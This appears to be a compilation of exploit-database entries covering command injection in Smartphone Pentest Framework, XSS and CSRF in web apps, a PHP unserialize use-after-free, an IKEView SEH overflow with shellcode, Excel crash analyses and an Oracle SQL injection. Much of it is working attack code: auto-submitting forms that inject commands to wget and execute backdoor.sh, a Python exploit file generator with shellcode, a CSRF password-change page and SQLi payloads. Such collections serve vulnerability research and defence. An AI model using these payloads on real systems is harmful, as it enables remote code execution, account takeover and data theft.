source: https://www.securityfocus.com/bid/56881/info

Smartphone Pentest Framework is prone to multiple remote command-execution vulnerabilities.

Remote attackers can exploit these issues to execute arbitrary commands within the context of the vulnerable application to gain root access. This may facilitate a complete compromise of an affected computer.

Smartphone Pentest Framework 0.1.3 and 0.1.4 are vulnerable; other versions may also be affected. 

1.

<form action="http://www.example.com/cgi-bin/frameworkgui/SEAttack.pl" method="post" name=f1>
<input type="hidden" name="platformDD2" value='android' />
<input type="hidden" name="hostingPath" value='a & wget http://www.example.com/backdoor.sh && chmod a+x ./backdoor.sh && ./backdoor.sh & ' />
<input type="submit" id="btn">
</form>
<script>
document.f1.submit()
</script>

2. 

<form action="http://www.example.com/cgi-bin/frameworkgui/CSAttack.pl" method="post" name=f1>
<input type="hidden" name="hostingPath" value='a & wget http://www.example.com/backdoor.sh && chmod a+x ./backdoor.sh && ./backdoor.sh & ' />
<input type="submit" id="btn">
</form>
<script>
document.f1.submit()
</script>

3.

<form action="http://www.example.com/cgi-bin/frameworkgui/attachMobileModem.pl" method="post" name=f1>
<input type="hidden" name="appURLPath" value='a & wget http://www.example.com/backdoor.sh && chmod a+x ./backdoor.sh && ./backdoor.sh & ' />
<input type="submit" id="btn">
</form>
<script>
document.f1.submit()
</script>

4.

<form action="http://www.example.com/cgi-bin/frameworkgui/guessPassword.pl" method="post" name=f1>
<input type="hidden" name="ipAddressTB" value='a & wget http://www.example.com/backdoor.sh && chmod a+x ./backdoor.sh && ./backdoor.sh & ' />
<input type="submit" id="btn">
</form>
<script>
document.f1.submit()
</script>
            
source: https://www.securityfocus.com/bid/56882/info

Simple Invoices is prone to multiple HTML-injection vulnerabilities and a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content.

Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or control how the site is rendered to the user. Other attacks are also possible. 

[http://]www.example.com/simpleinvoices/index.php?module=invoices&view=manage&having=%3C/script%3E%3Cscript%3Ealert%28%27POC%20XSS%27%29;%3C/script%3E%3Cscript%3E 
            
<!--
# Exploit Title: [Auto-exchanger version 5.1.0 Xsrf]
# Date: [2015/06/05]
# Exploit Author: [Aryan Bayaninejad]
# Linkedin : [https://www.linkedin.com/profile/view?id=276969082]
# Vendor Homepage: [www.auto-exchanger.com]
# Version: [Version 5.1.0]
# Demo : www.farhadexchange.com
# CVE : [CVE-2015-6827]

------------------------------------
details:
------------------------------------

Auto-exchanger version 5.1.0 suffers from an XSRF vulnerability; an attacker
is able to abuse this vulnerability to change a password through a hidden
iframe in another page.

-------------------------------------

Exploit:

-------------------------------------
-->

<html>
<body>
<iframe style="display:none" name="xsrf-frame"></iframe>
<form method="POST" action="http://farhadexchange.com/signup.php"
      target="xsrf-frame" id="xsrf-form">
  <input type="hidden" name="suser" value="victim_user">
  <input type="hidden" name="section" value="do_update">
  <input type="hidden" name="password0" value="testpassword123456">
  <input type="hidden" name="rid" value="">
  <input type="hidden" name="password1" value="testpassword123456">
  <input type="hidden" name="mail" value="victim_email">
  <input type="hidden" name="country" value="IR">
  <input type="hidden" name="cid" value="2">
  <input type="hidden" name="curreny_account" value="">
</form>
<script>document.getElementById("xsrf-form").submit()</script>
</body>
</html>
            
Yet Another Use After Free Vulnerability in unserialize() with SplDoublyLinkedList

Taoguang Chen <[@chtg](http://github.com/chtg)> - 
Write Date: 2015.8.27 
Release Date: 2015.9.4

A use-after-free vulnerability was discovered in unserialize(): the deserialization of an SplDoublyLinkedList object, combined with a crafted object's __wakeup() magic method, can be abused to leak arbitrary memory blocks or to execute arbitrary code remotely.

Affected Versions
------------
Affected is PHP 5.6 < 5.6.13
Affected is PHP 5.5 < 5.5.29
Affected is PHP 5.4 < 5.4.45

Credits
------------
This vulnerability was disclosed by Taoguang Chen.

Description
------------


The element loop in SplDoublyLinkedList::unserialize() (ext/spl/spl_dllist.c)
pushes every deserialized element straight into the list:

  while(*p == ':') {
    ++p;
    ALLOC_INIT_ZVAL(elem);
    if (!php_var_unserialize(&elem, &p, s + buf_len, &var_hash TSRMLS_CC)) {
      zval_ptr_dtor(&elem);
      goto error;
    }

    spl_ptr_llist_push(intern->llist, elem TSRMLS_CC);
  }


It has been demonstrated many times before that __wakeup() can cause a ZVAL
to be freed from memory. However, the ongoing deserialization still allows
R: or r: entries to set references to that already freed memory. This makes
a use-after-free attack possible, up to remote execution of arbitrary code.

Proof of Concept Exploit
------------
The PoC works on a standard MacOSX 10.11 installation of PHP 5.6.12.


<?php

class obj {
  var $ryat;
  function __wakeup() {
    // $ryat was deserialized as a reference (R:3) to the SplDoublyLinkedList
    // zval; assigning through it replaces that object with the integer 1,
    // which destroys the list and frees the element zval it was holding.
    $this->ryat = 1;
  }
}

// 24 bytes laid out like a PHP 5 zval on a 64-bit build
$fakezval = ptr2str(1122334455);   // zvalue_value.lval (controlled value)
$fakezval .= ptr2str(0);           // rest of the 16-byte value union
$fakezval .= "\x00\x00\x00\x00";   // refcount__gc
$fakezval .= "\x01";               // type = IS_LONG
$fakezval .= "\x00";               // is_ref__gc
$fakezval .= "\x00\x00";           // padding

// SplDoublyLinkedList payload: flags (i:1234), then one ':'-prefixed element (i:1)
$inner = 'i:1234;:i:1;';
// Outer array: [0] an int, [1] the list, [2] obj whose property references
// slot 3 (the list), [3] an array whose element R:5 references the list
// element that __wakeup() has already freed, [4] the fake zval bytes, which
// end up occupying that freed memory so [3][0] reads as int(1122334455).
$exploit = 'a:5:{i:0;i:1;i:1;C:19:"SplDoublyLinkedList":'.strlen($inner).':{'.$inner.'}i:2;O:3:"obj":1:{s:4:"ryat";R:3;}i:3;a:1:{i:0;R:5;}i:4;s:'.strlen($fakezval).':"'.$fakezval.'";}';

$data = unserialize($exploit);

var_dump($data);

// 8-byte little-endian encoding of an integer (pointer-sized on 64-bit)
function ptr2str($ptr)
{
  $out = '';
  for ($i = 0; $i < 8; $i++) {
    $out .= chr($ptr & 0xff);
    $ptr >>= 8;
  }
  return $out;
}

?>


Test the PoC on the command line:


$ php uafpoc.php
array(5) {
  [0]=>
  int(1)
  [1]=>
  &int(1)
  [2]=>
  object(obj)#2 (1) {
    ["ryat"]=>
    &int(1)
  }
  [3]=>
  array(1) {
    [0]=>
    int(1122334455)  <===  so we can control the memory and create fake ZVAL :)
  }
  [4]=>
  string(24) "?v?B????"
}
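Why index 3 of the dumped array reads back as int(1122334455): the 24-byte string stored at index 4 is laid out exactly like a PHP 5 zval on a 64-bit build, so a dangling zval pointer that lands on those bytes is interpreted as a live IS_LONG. The C below is an added model written for this page, not PHP's own header and not the author's code. It assumes the 64-bit PHP 5 zval layout (16-byte value union, 4-byte refcount, 1-byte type, 1-byte is_ref, 2 bytes of padding) that the string(24) in the dump implies, rebuilds the same bytes with the PoC's ptr2str() encoding and reinterprets them as that struct:

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

/* Stand-alone approximation of the PHP 5.x zval on a 64-bit build (assumed
 * layout, not taken from Zend/zend.h). Field order and sizes are what matter:
 * 16-byte value union, refcount, type, is_ref, then 2 bytes of padding. */
typedef union {
    int64_t lval;                                   /* IS_LONG payload        */
    double  dval;
    struct { char *val; int len; } str;
    void   *ht;
    struct { uint32_t handle; void *handlers; } obj;
} zvalue_value;

typedef struct {
    zvalue_value value;                             /* offset 0               */
    uint32_t     refcount__gc;                      /* offset 16              */
    uint8_t      type;                              /* offset 20              */
    uint8_t      is_ref__gc;                        /* offset 21, then padding */
} zval;

#define IS_LONG 1

/* Same encoding as the PoC's ptr2str(): 8 bytes, little-endian. */
static void ptr2str(uint64_t v, unsigned char out[8])
{
    for (int i = 0; i < 8; i++) { out[i] = (unsigned char)(v & 0xff); v >>= 8; }
}

/* Builds the 24-byte string the PoC stores at index 4 of the outer array. */
size_t build_fake_zval(unsigned char buf[24], uint64_t lval)
{
    ptr2str(lval, buf);                /* value.lval = controlled integer */
    ptr2str(0, buf + 8);               /* rest of the 16-byte value union */
    memset(buf + 16, 0, 4);            /* refcount__gc = 0                */
    buf[20] = IS_LONG;                 /* type = IS_LONG                  */
    buf[21] = 0;                       /* is_ref__gc = 0                  */
    buf[22] = buf[23] = 0;             /* padding                         */
    return 24;
}

/* What the engine sees when a dangling zval pointer lands on those bytes. */
int64_t fake_zval_lval(const unsigned char buf[24])
{
    zval z; memcpy(&z, buf, sizeof z); return z.value.lval;
}

unsigned fake_zval_type(const unsigned char buf[24])
{
    zval z; memcpy(&z, buf, sizeof z); return z.type;
}

/* Round trip with the PoC's constant: 1 when the bytes decode as IS_LONG
 * 1122334455, which is what var_dump() printed for [3][0]. */
int poc_roundtrip_ok(void)
{
    unsigned char buf[24];
    build_fake_zval(buf, 1122334455ULL);
    return sizeof(zval) == 24 && offsetof(zval, type) == 20 &&
           fake_zval_type(buf) == IS_LONG && fake_zval_lval(buf) == 1122334455LL;
}

int main(void)
{
    unsigned char buf[24];
    build_fake_zval(buf, 1122334455ULL);
    printf("sizeof(zval)=%zu type=%u lval=%lld\n", sizeof(zval),
           fake_zval_type(buf), (long long)fake_zval_lval(buf));
    return poc_roundtrip_ok() ? 0 : 1;
}
```

Changing the byte at offset 20 to another type tag is what turns this from an integer leak into a fake object or string header, which is the usual next step when a freed zval slot can be refilled with attacker-controlled bytes.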
            
Source: https://code.google.com/p/google-security-research/issues/detail?id=464

The following crash was observed in Microsoft Office 2007 with Microsoft Office File Validation Add-In disabled and Application Verifier enabled for testing and reproduction. This bug did not reproduce in Office 2010 or 2013. 

Attached files:
Original File: 1105668828_orig.xls
Crashing File: 1105668828_crash.xls
Minimized Crashing File: 1105668828_min.xls

The minimized crashing file shows two one-bit deltas from the original file. The first delta is at offset 0x1CF7E and the second at offset 0x3A966. Both of these offsets appear to be BIFFRecord lengths.

File Versions:
Excel.exe: 12.0.6718.5000
MSO.dll: 12.0.6721.5000

Observed Crash:

eax=00000000 ebx=00000000 ecx=00000000 edx=0012e3bc esi=0ecd8ff0 edi=0000089e
eip=3035a5ed esp=0012e3b0 ebp=0012e410 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246

3035a5e4 0f8530270a00    jne     Excel!Ordinal40+0x3fcd1a (303fcd1a)
3035a5ea 8b7518          mov     esi,dword ptr [ebp+18h]
Excel!Ordinal40+0x35a5ed:
3035a5ed 8b0e            mov     ecx,dword ptr [esi]  ds:0023:0ecd8ff0=????????
 
0:000> kb
ChildEBP RetAddr  Args to Child              
WARNING: Stack unwind information not available. Following frames may be wrong.
0012e410 3035ab4d 00134dc0 0000089e 00000028 Excel!Ordinal40+0x35a5ed
00130464 3035ab9e 00000028 0000000a ffffffff Excel!Ordinal40+0x35ab4d
00131ef0 3026f1cd 00000002 00000000 00000118 Excel!Ordinal40+0x35ab9e
00132514 3026d160 0000000a 00132560 00000118 Excel!Ordinal40+0x26f1cd
0013279c 30263a3d 0e1ecfb8 0000000a 00000000 Excel!Ordinal40+0x26d160
00132c98 302636a5 0e1ecfb8 00000004 00132d20 Excel!Ordinal40+0x263a3d
00132cac 3025869a 00000004 00132d20 00000000 Excel!Ordinal40+0x2636a5
00132d2c 30258553 00134dc0 0000001a 00132d58 Excel!Ordinal40+0x25869a
00132e7c 30258470 30edc060 0e17ac00 0ebb7fac Excel!Ordinal40+0x258553
00132e94 32c50135 30edc060 0e17ac00 00133190 Excel!Ordinal40+0x258470
00132f48 32c4fb6d 00133190 0e83ce38 00000001 mso!Ordinal6768+0x13e7
00132f98 32c4fd30 00133190 00132fec 00000001 mso!Ordinal6768+0xe1f
00132ff8 32c4fb6d 000001be 0e83ce38 00000001 mso!Ordinal6768+0xfe2
00133048 32c4f756 00133190 001330cc 00000000 mso!Ordinal6768+0xe1f
00133108 32c4f0e2 00133190 30eba978 0e74ed90 mso!Ordinal6768+0xa08
0013313c 302583f2 0e74ed90 00133190 0e83ce38 mso!Ordinal6768+0x394
001331c8 302582df 0cc88fd8 00134dc0 00002020 Excel!Ordinal40+0x2583f2
00133f44 301153f9 0cc88fd8 00134b88 00000102 Excel!Ordinal40+0x2582df

We can see that esi is holding a pointer to invalid memory. This is a heap address.

0:000> !heap -p -a 0xecd8ff0
    address 0ecd8ff0 found in
    _DPH_HEAP_ROOT @ 1161000
    in free-ed allocation (  DPH_HEAP_BLOCK:         VirtAddr         VirtSize)
                                    eb04f40:          ecd8000             2000
    7c83e330 ntdll!RtlFreeHeap+0x0000011a
    018b1611 vfbasics!AVrfpRtlFreeHeap+0x000000a8
    331039d5 mso!Ordinal1743+0x00002d4d
    329c91d1 mso!MsoFreePv+0x0000003f
    3025ac56 Excel!Ordinal40+0x0025ac56
    3026f1cd Excel!Ordinal40+0x0026f1cd
    3026d160 Excel!Ordinal40+0x0026d160
    30263a3d Excel!Ordinal40+0x00263a3d
    302636a5 Excel!Ordinal40+0x002636a5
    3025869a Excel!Ordinal40+0x0025869a
    30258553 Excel!Ordinal40+0x00258553
    30258470 Excel!Ordinal40+0x00258470
    32c50135 mso!Ordinal6768+0x000013e7
    32c4fb6d mso!Ordinal6768+0x00000e1f


esi points into a freed allocation: this is a use-after-free vulnerability.

Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38215.zip
            
#!/usr/bin/env python
# Exploit Title: IKEView.exe R60 local SEH Exploit
# Date: 17/09/2015
# Exploit Author: cor3sm4sh3r
# Author email: cor3sm4sh3r[at]gmail.com
# Contact: https://in.linkedin.com/pub/shravan-kumar-ceh-oscp/103/414/450
# Category: Local

#[+] Gr337z: hyp3rlinx for finding the bug
#[+] Source:
#http://hyp3rlinx.altervista.org/advisories/AS-IKEVIEWR60-0914.txt
# exploit has been tested on Win XP Professional SP2

#Vendor:
#================================
#www.checkpoint.com
#http://pingtool.org/downloads/IKEView.exe

# Builds a malicious IKEView.elg: 4424 bytes of filler reach the SEH record;
# after the access violation the handler (pop pop ret) returns into nSEH,
# which jumps over the handler address into the nop sled and the shellcode.
filename = "IKEView.elg"

nseh = b"\x90\x90\xeb\x32"  # nop, nop, jmp short +0x32: over SEH into the tail of the sled
seh = b"\xc0\x28\x40\x00"   # pop pop ret at 0x004028c0
nopsled = b"\x90" * 50
# bad chars for this target:
# \x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20

# Shellcode: WinExec("calc.exe", SW_SHOWNORMAL) followed by ExitProcess().
# The kernel32 addresses are those of the Windows XP SP2 test system and are
# hardcoded; adjust them for any other build.
buf  = b"\x33\xc0"             #=> XOR EAX,EAX          |  Zero out EAX register
buf += b"\x50"                 #=> PUSH EAX             |  Push EAX to have null-byte padding for "calc.exe"
buf += b"\x68\x2E\x65\x78\x65" #=> PUSH ".exe"          |  Push the ASCII string to the stack
buf += b"\x68\x63\x61\x6C\x63" #=> PUSH "calc"          |
buf += b"\x8B\xC4"             #=> MOV EAX,ESP          |  Put a pointer to the ASCII string in EAX
buf += b"\x6A\x01"             #=> PUSH 1               |  Push uCmdShow parameter to the stack
buf += b"\x50"                 #=> PUSH EAX             |  Push the pointer to lpCmdLine to the stack
buf += b"\xBB\x4d\x11\x86\x7C" #=> MOV EBX,7C86114d     |  Move the pointer to WinExec() into EBX
buf += b"\xFF\xD3"             #=> CALL EBX
buf += b"\x33\xc0"             #=> XOR EAX,EAX          |  Zero out EAX register
buf += b"\x50"                 #=> PUSH EAX             |  Push EAX (uExitCode = 0)
buf += b"\xBB\xa2\xca\x81\x7c" #=> MOV EBX,7C81caa2     |  ExitProcess()
buf += b"\xFF\xD3"             #=> CALL EBX

junk = b"A" * 4424
payload = junk + nseh + seh + nopsled + buf
with open(filename, "wb") as f:   # binary mode so the bytes are written unmodified
    f.write(payload)
            
Source: https://code.google.com/p/google-security-research/issues/detail?id=469

The following crash was observed in Microsoft Office 2007 Excel with Microsoft Office File Validation Add-In disabled and Application Verifier enabled for testing and reproduction. This bug did not reproduce in Office 2010 or 2013.

Attached files:
Original File: 3013413838_orig.xls
Crashing File: 3013413838_crash.xls
Minimized Crashing File: 3013413838_min.xls

The minimized crashing file shows a one bit delta from the original file at offset 0x139F. OffVis did not reveal anything unique about this offset in the minimized file.

File Versions:
Excel.exe: 12.0.6718.5000
OGL.dll: 12.0.6719.5000
oart.dll: 12.0.6683.5002
GDI32.dll: 5.2.3790.5563

Observed Crash:

This crashing eip was observed 4 times in fuzzing results, with various invalid memory addresses being dereferenced.

eax=8a94e1a1 ebx=00000000 ecx=10a80598 edx=8a94e1a0 esi=0013d478 edi=0013d42c
eip=3bd18f75 esp=0013d3dc ebp=0013d3e0 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010206
OGL!ScanOperation::Convert_24_sRGB:
3bd18f68 55              push    ebp
3bd18f69 8bec            mov     ebp,esp
3bd18f6b 837d0800        cmp     dword ptr [ebp+8],0
3bd18f6f 7431            je      OGL!ScanOperation::Convert_24_sRGB+0x3a (3bd18fa2)
3bd18f71 8d4201          lea     eax,[edx+1]
3bd18f74 56              push    esi
=> 3bd18f75 0fb65001        movzx   edx,byte ptr [eax+1]       ds:0023:8a94e1a2=??

0:000> kb L8
ChildEBP RetAddr  Args to Child              
0013d3e0 3be703b3 0000666f 0013d42c 00000000 OGL!ScanOperation::Convert_24_sRGB+0xd
0013d3fc 3be18f32 00000000 8a94e1a0 0000666f OGL!EpAlphaBlender::Blend+0x55
0013d568 3bd9f6c1 0013d894 00000000 0013d58c OGL!ConvertBitmapData+0x61
0013d5a4 3bde4137 00000000 00000001 000e200b OGL!GpMemoryBitmap::InternalLockBits+0x105
0013d5d0 3bdfa09b 05492fa8 0013d5f8 00000001 OGL!GpMemoryBitmap::LockBits+0xba
0013d608 3bdfac0c 0013d7bc 0013d894 0013d62c OGL!CopyOnWriteBitmap::PipeLockBitsFromMemory+0xb8
0013d6e8 3bd2b7e7 0013d7bc 0013d894 0013d7d0 OGL!CopyOnWriteBitmap::PipeLockBits+0x553
0013d700 3be4cc56 0013d7bc 0013d894 00000001 OGL!GpBitmap::PipeLockBits+0x4e

The function OGL!ScanOperation::Convert_24_sRGB was called with edx pointing to an invalid memory location: 0x8a94e1a0. Tracing back we can find that the heap address where edx came from was allocated with the following call stack:

3be70fe2 OGL!GpMalloc+0x00000014
3bd58669 OGL!CopyOnWriteBitmap::CopyOnWriteBitmap+0x00000049
3be0517e OGL!CopyOnWriteBitmap::Create+0x00000021
3be0514d OGL!GpBitmap::GpBitmap+0x00000030

The edx value was copied in from the stack at the following location OGL!GpMemoryBitmap::InitMemoryBitmap():

3bd4f6f0 8b45fc          mov     eax,dword ptr [ebp-4]
3bd4f6f3 6a06            push    6
3bd4f6f5 59              pop     ecx
3bd4f6f6 8bf3            mov     esi,ebx
=>3bd4f6f8 f3a5            rep movs dword ptr es:[edi],dword ptr [esi]

The stack location was set with the invalid value here in OGL!ValidateBitmapInfo():

3bda46ed 8b4d08          mov     ecx,dword ptr [ebp+8]
3bda46f0 895804          mov     dword ptr [eax+4],ebx
3bda46f3 895008          mov     dword ptr [eax+8],edx
3bda46f6 89480c          mov     dword ptr [eax+0Ch],ecx
=> 3bda46f9 897810          mov     dword ptr [eax+10h],edi

Edi is set earlier as the result of an imul instruction that is then added to a base heap pointer:

.text:3BDA46CB                 lea     edi, [ebx-1]
.text:3BDA46CE                 imul    edi, edx
.text:3BDA46D1                 add     edi, [ebp+arg_4] ; bad value here

With this PoC edi=0x0000666e and edx=0x00013350. The edx value is calculated earlier in the same function. If 0xf9ef540 is the base pointer (arg_4) we end up setting this value to be 0x666e*0x13350+0xf9ef540 or 0x8a94e1a0 as we saw in the initial bad memory access. The heap chunk referenced at 0xf9ef540 has an original allocation size of 15156 and we've set our pointer far out of bounds of this allocation range.

There is a distinct lack of overflow checks and bounds checking in the OGL!ValidateBitmapInfo function that may lead to memory corruption when doing bitmap conversion later on in the code. For example, if the 0x13350 value is able to grow to 0x27fd0 we can set the edi value to be 0xffffcb60 (0x666e * 0x27fd0 = 0xffffcb60) which leads to an out of bound write instead of an out of bound read later in the code.
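The arithmetic above (edi = (ebx-1) * edx + arg_4) fits in a few lines. The following is an added example written for this page, not OGL's code, and it assumes the advisory's reading of the disassembly: ebx-1 is a row count minus one (0x666e), edx a per-row stride in bytes (0x13350), and arg_4 the base of the 15156-byte allocation at 0xf9ef540; those roles are an assumption, the values are the advisory's. It reproduces the out-of-bounds pointer with the same unchecked 32-bit arithmetic the x86 code performs, and beside it the overflow and bounds checks the advisory says are missing:

```c
#include <stdint.h>
#include <stdbool.h>
#include <stdio.h>

/* Values taken from the advisory's PoC analysis. */
#define POC_BASE        0x0f9ef540u   /* arg_4: base heap pointer             */
#define POC_ALLOC_SIZE  15156u        /* original allocation size of the chunk */
#define POC_ROWS_M1     0x666eu       /* edi = ebx - 1 (assumed: rows - 1)     */
#define POC_STRIDE      0x13350u      /* edx (assumed: bytes per row)          */

/* Unchecked form, as in the disassembly: imul edi,edx ; add edi,[ebp+arg_4].
 * uint32_t arithmetic wraps silently, exactly like the 32-bit x86 code. */
uint32_t scan_ptr_unchecked(uint32_t base, uint32_t rows_m1, uint32_t stride)
{
    return rows_m1 * stride + base;
}

/* Hardened form: fail on multiplication or addition wrap and require the whole
 * last row [base+offset, base+offset+stride) to sit inside the allocation
 * [base, base+alloc_size). Returns true and sets *out on success. */
bool scan_ptr_checked(uint32_t base, uint32_t alloc_size,
                      uint32_t rows_m1, uint32_t stride, uint32_t *out)
{
    uint32_t offset, end;

    if (stride == 0 || stride > alloc_size)
        return false;                     /* no room for even one row          */
    if (rows_m1 > UINT32_MAX / stride)
        return false;                     /* rows_m1 * stride would wrap       */
    offset = rows_m1 * stride;
    if (offset > alloc_size - stride)
        return false;                     /* last row ends past the chunk      */
    end = base + alloc_size;
    if (end < base)
        return false;                     /* allocation itself wraps: bad base */
    *out = base + offset;
    return true;
}

/* Convenience wrapper: the checked pointer, or 0 when the check rejects it. */
uint32_t scan_ptr_or_zero(uint32_t base, uint32_t alloc_size,
                          uint32_t rows_m1, uint32_t stride)
{
    uint32_t p;
    return scan_ptr_checked(base, alloc_size, rows_m1, stride, &p) ? p : 0;
}

int main(void)
{
    /* 0x8a94e1a0: the faulting edx from the crash */
    printf("unchecked PoC pointer:        0x%08x\n",
           scan_ptr_unchecked(POC_BASE, POC_ROWS_M1, POC_STRIDE));
    /* 0xffffcb60: the product the advisory gives for a stride of 0x27fd0 */
    printf("unchecked product, 0x27fd0:   0x%08x\n",
           scan_ptr_unchecked(0, POC_ROWS_M1, 0x27fd0u));
    printf("checked PoC values:           0x%08x (0 = rejected)\n",
           scan_ptr_or_zero(POC_BASE, POC_ALLOC_SIZE, POC_ROWS_M1, POC_STRIDE));
    printf("checked 3 rows of 0x1000:     0x%08x\n",
           scan_ptr_or_zero(POC_BASE, POC_ALLOC_SIZE, 2, 0x1000u));
    return 0;
}
```

The first check (stride against the allocation) already rejects the PoC, and the division-based check rejects the 0x27fd0 case before the product wraps, so neither path needs to trust the later out-of-bounds read or write to fail safely.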

Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38217.zip
            
Source: https://code.google.com/p/google-security-research/issues/detail?id=465

The following crash was observed in Microsoft Office 2007 with Microsoft Office File Validation Add-In disabled and Application Verifier enabled for testing and reproduction. This bug did not reproduce in Office 2010 or 2013. 

Attached files:
Original File: 1516065514_orig.xls
Crashing File: 1516065514_crash.xls
Minimized Crashing File: 1516065514_min.xls

The minimized crashing file shows a one-bit delta from the original file at offset 0x49E8. OffVis reports this to be the CreateTime field of an OLESSDirectoryEntry structure.

File Versions:
Excel.exe: 12.0.6718.5000
MSO.dll: 12.0.6721.5000

Observed Crash:

When run without Application Verifier enabled the following crash occurs:
eax=30272d58 ebx=03b49330 ecx=03b49144 edx=03a64d44 esi=30f6dca0 edi=03a64d40
eip=fffffffc esp=00133e80 ebp=00133e84 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010206
fffffffc ??              ???

0:000> kb L8
ChildEBP RetAddr  Args to Child              
WARNING: Frame IP not in any known module. Following frames may be wrong.
00133e7c 3028f4da 00133ec8 3028d2ef 00000005 0xfffffffc
00133e84 3028d2ef 00000005 00000001 03b49200 Excel!Ordinal40+0x28f4da
00133ec8 30290e14 03b49330 00000001 00000000 Excel!Ordinal40+0x28d2ef
00133fa0 3028a2b9 00000000 00000000 00000000 Excel!Ordinal40+0x290e14
00134130 302912ae 00000000 00000000 00000000 Excel!Ordinal40+0x28a2b9
0013414c 30286206 00000001 00000000 03b66c00 Excel!Ordinal40+0x2912ae
001341cc 302860ce 00000000 ffffffff 00000001 Excel!Ordinal40+0x286206
0013426c 30282360 03b49000 027c6a00 d107955b Excel!Ordinal40+0x2860ce

In this crash case eip was corrupted to 0xfffffffc. Tracing through sub_3028F4B4 we see something along the lines of:
  x = *dword_30F5F9BC + 0x144;  // x=0x30272d58 
  fptr = x + x[0x14]; // x[0x14] == 0 
  fptr(); // calling pointer at 0x30272d58 = 0xfffffffc

It looks as though the global variable at 30f5f9bc was used with incorrect type information or otherwise corrupted. Running the same poc file again but with Application Verifier enabled gets us closer to the root of the issue with the following crash observed:

eax=0ff28e50 ebx=07b42420 ecx=0012c91c edx=00000020 esi=0364efe8 edi=00000000
eip=30299c9e esp=0012c944 ebp=0012c950 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for Excel.exe - 
Excel!Ordinal40+0x299c9e:
30299c9e 8b80f0030000    mov     eax,dword ptr [eax+3F0h] ds:0023:0ff29240=????????

0:000> kb L8
ChildEBP RetAddr  Args to Child              
WARNING: Stack unwind information not available. Following frames may be wrong.
0012c950 3006b70a 00000005 00000001 07b42420 Excel!Ordinal40+0x299c9e
0012cc84 3006b556 0012ceb4 0020020a 07b42420 Excel!Ordinal40+0x6b70a
0012ce8c 3006b3a2 0012ceb4 0ee46ff0 00000009 Excel!Ordinal40+0x6b556
00133050 3006a11c 00133e08 0ee46ff0 00000009 Excel!Ordinal40+0x6b3a2
00133ca0 3006a01b 00133e08 0ee46ff0 00000009 Excel!Ordinal40+0x6a11c
00133d50 30069ead 00133e08 0ee46ff0 00000009 Excel!Ordinal40+0x6a01b
00133d70 302972c0 00133e08 0ee46ff0 00000009 Excel!Ordinal40+0x69ead
00133e28 302974c7 0f82ef58 00133ec0 00133eac Excel!Ordinal40+0x2972c0

We can see here that eax is being indexed at an offset of 0x3f0. However, if we look at the actual allocation for the chunk eax is pointed to we see that the allocation size was only 0x1b0.

0:000> !heap -p -a 0xff28e50
    address 0ff28e50 found in
    _DPH_HEAP_ROOT @ 1161000
    in busy allocation (  DPH_HEAP_BLOCK:         UserAddr         UserSize -         VirtAddr         VirtSize)
                                 f7b5400:          ff28e50              1b0 -          ff28000             2000
    7c83d6d4 ntdll!RtlAllocateHeap+0x00000e9f
    018b1504 vfbasics!AVrfpRtlAllocateHeap+0x000000c3
    33103a8f mso!Ordinal1743+0x00002e07
    329c7e66 mso!MsoPvAllocCore+0x0000005a
    3000b694 Excel!Ordinal40+0x0000b694
    3000b640 Excel!Ordinal40+0x0000b640

This PoC behaves like a type confusion or memory corruption issue in areas not protected by Application Verifier. The fact that eip was corrupted indicates a high likelihood of exploitability.

Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38216.zip
            
# Exploit Title: Web Application Farol unauthenticated SQL injection
# Date: 2015-09-16
# Exploit Author: Thierry Fernandes Faria [ a.k.a SoiL ] [ thierryfariaa (at) gmail (dot) com ]
# Vendor Homepage:http://www.teiko.com.br/pt/solucoes/infraestrutura-em-ti/farol
# Version: [All]
# CVE : CVE-2015-6962
# OWASP Top10: A1-Injection

+---------------------+
+ Product Description +
+---------------------+
The FAROL web application is software that monitors databases.
 
+----------------------+
+ Exploitation Details +
+----------------------+
An unauthenticated SQL injection vulnerability has been detected in the login page of the FAROL web application.

The e-mail field of the login page is vulnerable to error-based SQL injection; the error messages below show an Oracle backend.

Vulnerable Page: http://target/tkmonitor/estrutura/login/Login.actions.php?recuperar
Vulnerable POST Parameter: email
Usage: email'[error-based SQLi]--

eg:
email=1'%20or%201=ctxsys.drithsx.sn(1,(select%20sys.stragg(distinct%20banner)%20from%20v$version))--

ORA-20000: Oracle Text error:
DRG-11701: thesaurus CORE 11.2.0.4.0 ProductionNLSRTL Version 11.2.0.4.0 - ProductionOracle Database 11g Enterprise Edition Release 11.2.0.4.0 - 64bit ProductionPL/SQL Release 11.2.0.4.0 - ProductionTNS for Linux: Version 11.2.0.4.0 - Production does not exist
ORA-06512: at "CTXSYS.DRUE", line 160

+----------+
+ Solution +
+----------+ 
Upgrade the software
            
=============================================
- Release date: 14.09.2015
- Discovered by: Dawid Golunski
- Severity: High
=============================================

 
I. VULNERABILITY
-------------------------

Kirby CMS <= 2.1.0     CSRF Content Upload and PHP Script Execution

 
II. BACKGROUND
-------------------------

- Kirby CMS

"Kirby is a file‑based CMS
Easy to setup. Easy to use. Flexible as hell."

http://getkirby.com/

 
III. INTRODUCTION
-------------------------

KirbyCMS has a vulnerability that allows uploading normally disallowed PHP
script files.
This issue can only be exploited by authenticated users; however, the admin
role is not required.

Additionally, KirbyCMS has another vulnerability, Cross-Site Request Forgery
(CSRF), which may allow attackers to perform file upload actions on behalf
of an already authenticated KirbyCMS user, if an attacker manages to trick
them into visiting a specially-crafted website.
